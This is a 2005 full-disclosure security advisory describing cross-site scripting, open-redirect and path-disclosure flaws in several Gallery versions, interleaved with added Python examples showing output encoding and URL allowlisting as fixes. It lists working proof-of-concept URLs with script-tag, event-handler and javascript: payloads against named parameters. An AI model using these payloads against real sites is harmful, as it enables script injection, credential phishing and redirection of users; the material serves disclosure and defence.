[VulnWatch] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/17/05

    Date: Mon, 17 Jan 2005 22:34:43 +0200
    To: Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, "securitytracker.com" <bugs@securitytracker.com>, news@securiteam.com, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Gallery
    Vendors: http://gallery.sourceforge.net
    Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
    Platforms: Windows
    Bug: Cross Site Scripting Vulnerability
    Exploitation: Remote With Browser
    Date: 17 Jan 2005
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Gallery is vulnerable to cross-site scripting, allowing a remote attacker
    to inject script that executes in the browser of a user while visiting a
    remote gallery.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    =======
    2) Bugs
    =======

    Gallery v1.3.4-pl1 contains a vulnerability inside ‘add_comment.php’ in the
    ‘index’ parameter. The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>

    Gallery v1.3.4-pl1 also contains a vulnerability inside ‘slideshow_low.php’
    in ALL of its parameters. ‘slideshow_low.php’ accepts the following
    parameters, each of which is reflected into the page:
    set_albumName
    slide_index
    slide_full
    slide_loop
    slide_pause
    slide_dir

    The injection can be done using the classical tag closing:
    "><script>alert()</script>

    For Example:
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1

    Gallery v1.3.4-pl1 has a further vulnerability inside ‘search.php’ in the
    ‘searchstring’ parameter. Here the injection does not need a new tag: a
    hex-encoded quote closes the attribute value and an HTML event handler is
    appended to the existing tag:
    %22%20onactivate%3D"alert%28%29"

    For Example:
    http://<host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"

    Gallery v1.4.4-pl2 contains a vulnerability inside ‘login.php’ in the
    ‘username’ parameter.
    The injection can be done using a hex-encoded tag closing and an HTML event:
    %22%20onactivate%3D"alert%28%29"

    For Example:
    http://<host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20onactivate%3Dalert%28%29%3e
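    Both injection styles above (the tag-closing payload used against
    ‘add_comment.php’ and ‘slideshow_low.php’, and the attribute-breakout
    event-handler payload used against ‘search.php’ and ‘login.php’) depend on
    the same defect: a request parameter is echoed into a quoted HTML
    attribute without output encoding. The following Python script is an added
    example, not code from this advisory or from Gallery. It models such a
    field in its vulnerable and output-encoded forms and then parses the result
    the way a browser would, to check whether the payload became live markup.
    The hidden-input template and the field name ‘index’ are assumptions.

```python
import html
from html.parser import HTMLParser

# Payloads constructed from the advisory text.
TAG_CLOSE = '"><script>alert()</script>'    # closes the attribute and the tag
EVENT_HANDLER = '" onactivate="alert()"'    # stays in the tag, adds a handler


def render_vulnerable(index: str) -> str:
    """Assumed model of the reported bug: the request parameter is echoed
    straight into a quoted attribute value (PHP: value="<?= $index ?>")."""
    return f'<input type="hidden" name="index" value="{index}">'


def render_hardened(index: str) -> str:
    """Same field with output encoding for the attribute context, i.e. the
    equivalent of htmlspecialchars($index, ENT_QUOTES): quotes, angle
    brackets and ampersands become entities and cannot end the value."""
    return f'<input type="hidden" name="index" value="{html.escape(index, quote=True)}">'


class _MarkupCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_markup(page: str) -> dict:
    """Parse `page` as a browser would and report whether attacker input
    became live markup: an extra <script> element or an event handler."""
    collector = _MarkupCollector()
    collector.feed(page)
    collector.close()
    return {"script_tags": collector.tags.count("script"),
            "event_handlers": collector.handlers}


if __name__ == "__main__":
    for name, payload in (("tag close", TAG_CLOSE), ("event handler", EVENT_HANDLER)):
        print(name, "vulnerable:", injected_markup(render_vulnerable(payload)))
        print(name, "hardened:  ", injected_markup(render_hardened(payload)))
```

    With the vulnerable template the tag-closing payload yields a second
    element, a script tag, and the event-handler payload yields an on*
    attribute on the input itself; with the encoded template both come back as
    inert attribute text. ‘onactivate’ is an Internet Explorer event, which is
    why the advisory targets IE, but the check flags any on* attribute, so a
    payload using a handler other browsers honour would be caught the same way.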
    This version of Gallery also has an open redirection. This is a security
    risk because an attacker can send someone a link that redirects to a host
    the attacker controls, or use the redirect to make the user's browser
    carry out an attack or consume a target's resources.

    For Example:
    http://<host>/gallery/do_command.php?set_fullOnly=on&return=<escape encoded evil host name>&cmd=

    All the vulnerabilities described above can be used to remotely load a
    JavaScript file. The injected JavaScript code could be used for:
    Automatic launching of malicious code (remote compromise via Internet
    Explorer exploits).
    Identity theft using a spoofed re-login window (only for galleries with
    login).
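    A same-site check for a ‘return’ parameter like the one above, as an added
    example that is not Gallery's code: the installation hostname
    gallery.example and the fallback landing page are assumptions. It accepts
    only a site-relative path or an http(s) URL whose real host is the site,
    and it rejects the forms that commonly slip past naive prefix checks.

```python
from urllib.parse import urlsplit

SITE_HOST = "gallery.example"   # assumed hostname of the Gallery installation
FALLBACK = "/gallery/"          # assumed safe landing page


def safe_return_url(value: str, site_host: str = SITE_HOST, fallback: str = FALLBACK) -> str:
    """Return `value` only if following it keeps the user on this site;
    otherwise return `fallback`. Accepts a site-relative path beginning with
    exactly one '/' or an http(s) URL whose host is `site_host`."""
    # CR/LF or other control characters would let the value split the
    # Location header, so they are rejected outright.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
        return fallback
    value = value.strip()
    if not value:
        return fallback
    # '//evil' and '/\evil' are scheme-relative URLs to a browser, not paths.
    if value.startswith("/"):
        return fallback if value.startswith(("//", "/\\")) else value
    try:
        parts = urlsplit(value)
    except ValueError:
        return fallback
    # .hostname drops userinfo and port, so 'http://site@evil/' and
    # 'http://evil:80/' are compared on the host that is really contacted.
    if parts.scheme.lower() in ("http", "https") and parts.hostname == site_host.lower():
        return value
    return fallback


if __name__ == "__main__":
    for candidate in ("/gallery/view_album.php?set_albumName=Eros",
                      "http://www.google.com",
                      "//www.google.com",
                      "http://gallery.example@www.google.com/",
                      "javascript:alert()",
                      "http://gallery.example/gallery/"):
        print(f"{candidate!r:50} -> {safe_return_url(candidate)!r}")
```

    The value is checked after URL decoding, which is how the application
    would see the advisory's return=http%3A%2F%2Fwww.google.com. A strict
    allowlist (same host, http or https only) is simpler and safer than trying
    to enumerate bad prefixes.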

    Gallery v2.0 Alpha contains a vulnerability in the comment form (reached
    through ‘main.php’ with g2_controller=comment:AddComment) in the
    ‘g2_form[subject]’ field. The injection can be done with an inline
    javascript: protocol URL inside an [img] tag:
    javascript:alert()

    For Example:
    http://<host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview
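    The [img] payload works when a markup-to-HTML step copies the tag body into
    an src attribute without checking the URL scheme. The following Python
    script is an added example, not Gallery's own BBCode code: it shows that
    conversion in a vulnerable form and in a hardened form that allowlists the
    scheme and encodes the URL. The [img] syntax is taken from the advisory;
    the hostnames in the sample subjects are constructed.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = ("http", "https")


def render_img_vulnerable(text: str) -> str:
    """Assumed model of the bug: the [img] body is copied straight into a
    src attribute, so [img]javascript:alert()[/img] becomes a script URL."""
    return IMG_TAG.sub(lambda m: f'<img src="{m.group(1)}">', text)


def render_img_hardened(text: str) -> str:
    """Allowlist the URL scheme before emitting an <img>, and HTML-encode the
    URL so it cannot close the attribute. Anything else is shown as text."""
    def replace(match: re.Match) -> str:
        url = match.group(1).strip()
        try:
            scheme = urlsplit(url).scheme.lower()
        except ValueError:
            scheme = ""
        if scheme in ALLOWED_SCHEMES:
            return f'<img src="{html.escape(url, quote=True)}">'
        return html.escape(match.group(0))
    return IMG_TAG.sub(replace, text)


def src_scheme(markup: str) -> Optional[str]:
    """Scheme of the first <img src=...> in `markup` ('' for a relative URL),
    or None when no <img> was emitted. Used to check the two renderers."""
    m = re.search(r'<img src="([^"]*)"', markup)
    if not m:
        return None
    return urlsplit(html.unescape(m.group(1))).scheme.lower()


if __name__ == "__main__":
    # Constructed sample subjects, including the advisory's payload.
    for subject in ("[img]javascript:alert()[/img]",
                    "[IMG]JavaScript:alert()[/IMG]",
                    "[img]http://gallery.example/pic.jpg[/img]",
                    '[img]http://gallery.example/a.jpg" onerror="alert()[/img]'):
        print(render_img_vulnerable(subject))
        print(render_img_hardened(subject))
```

    Checking the parsed scheme against a short allowlist, rather than searching
    the string for "javascript:", also covers case variations and data: URLs.
    Scheme-relative (//host/...) and relative URLs are rejected by this policy;
    relax that deliberately if the gallery needs them.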

    Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
    ‘g2_subView’ parameter. It is possible to replace any valid subView value,
    such as comment:ShowComments, with the admin value core:UserAdmin. The
    request then runs until PHP's 30-second execution limit is hit, and the
    resulting fatal error, which the server displays to the client because PHP
    error output is enabled, prints the full filesystem path of the gallery on
    the server.

    For Example:
    http://<host>/g2/main.php?g2_return=http://<host>/main.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D<any valid/invalid session id such as: be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core:UserAdmin

    Then the following data will be printed out to the attacker:
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/modules/core/UserAdmin.inc on line 55

    Second time:
    Fatal error: Maximum execution time of 30 seconds exceeded in
    /mnt/1/<name>/www/<host>/g2/modules/core/classes/GalleryUtilities.class on line 596

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Gallery v1.3.4-pl1
    http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>alert()</script>
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><script>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
    http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
    http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

    Gallery v1.4.4-pl2
    http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e<plaintext>
    http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=

    Gallery v2.0 Alpha

    1) http://<host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview

    2) http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
    
